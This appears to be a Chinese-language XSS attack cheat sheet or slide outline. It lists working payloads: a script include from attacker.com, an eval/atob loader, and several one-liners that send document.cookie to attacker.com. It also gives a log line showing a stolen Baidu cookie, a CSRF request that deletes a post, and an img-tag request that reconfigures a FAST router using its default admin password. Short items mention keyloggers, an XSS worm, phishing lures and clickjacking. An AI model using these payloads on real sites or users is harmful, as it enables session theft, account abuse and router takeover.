██╗  ██╗███████╗███████╗
╚██╗██╔╝██╔════╝██╔════╝
 ╚███╔╝ ███████╗███████╗
 ██╔██╗ ╚════██║╚════██║
██╔╝ ██╗███████║███████║
╚═╝  ╚═╝╚══════╝╚══════╝

XSS漏洞

  • echo $_GET['param'];
  • XSS
  • title tag XSS
  • 访问 http://site.com/?param=<script src='http://attacker.com/1.js'></script>
  • eval == evil
  • tunnel.html
    <body><script>eval(unescape(atob(location.search.slice(1))))</script></body>
    ...
    '/tunnel.html?'+btoa(escape(jscode))
    

    XSS利用 - Stealing

  • new Image().src="https://attacker.com/?cookie="+escape(document.cookie)
  • var script = document.createElement('script');script.src="https://attacker.com/?cookie="+escape(document.cookie);document.body.append(script)
  • fetch('https://attacker.com/?cookie='+document.cookie)
  • # tail -f mb_accesslog
    45.33.104.18 - - [09/Mar/2020:22:12:29 +0800] "GET /?cookie=BIDUPSID=4B3A1F21C50AA81B...省略...BD_HOME=1 HTTP/1.1" 301 5 "https://www.baidu.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36"
    
  • document.cookie [cookie 设置成httponly 防js拿]
  • document.body.innerText
  • IP geo agent Info
  • Keylogger Script
  • 借刀杀人

  • 通过社工方法引诱受害人点击操作,依赖于受害人的环境
  • new Image().src="http://www.victim-sns.com/del_post?id=33456" 删除一篇日志[需加hash/Token校验]
  • <img src="http://192.168.1.1/userPpm/ManageControlRpm.html?port=80&ip=255.255.255.255&Save=%B1%A3+%B4%E6"> FAST无线路由器WEB管理的默认用户名与密码: admin
  • Weibo XSS Worm
  • 钓鱼

  • 广东人吃(婴儿)汤就为了状阳【骇人新闻】
  • 发红包
  • 伪装

  • clickjacking